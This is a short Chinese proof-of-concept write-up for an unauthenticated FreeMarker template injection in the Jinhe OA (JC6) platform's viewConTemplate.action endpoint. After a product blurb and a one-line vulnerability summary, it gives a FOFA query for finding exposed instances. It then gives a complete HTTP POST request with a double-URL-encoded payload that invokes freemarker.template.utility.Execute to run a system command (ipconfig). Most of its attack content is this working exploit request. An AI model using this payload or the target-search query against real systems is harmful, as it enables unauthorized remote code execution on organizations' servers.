0x01 产品简介
金和数字化智能办公平台(简称JC6)是一款结合了人工智能技术的数字化办公平台,为企业带来了智能化的办公体验和全面的数字化转型支持。同时符合国家信创认证标准,支持组织数字化转型,实现业务流程的数字化、智能化和协同化,提高企业竞争力。
0x02 漏洞概述
金和OA viewConTemplate.action接口存在FreeMarker模板注入漏洞,未授权的攻击者可以通过该漏洞远程执行代码。
0x03 测绘语句
fofa: app="金和网络-金和OA"
0x04 漏洞复现
POST /jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
moduId=1&code=%253Cclob%253E%2524%257B%2522freemarker.template.utility.Execute%2522%253Fnew%28%29%28%2522ipconfig%2522%29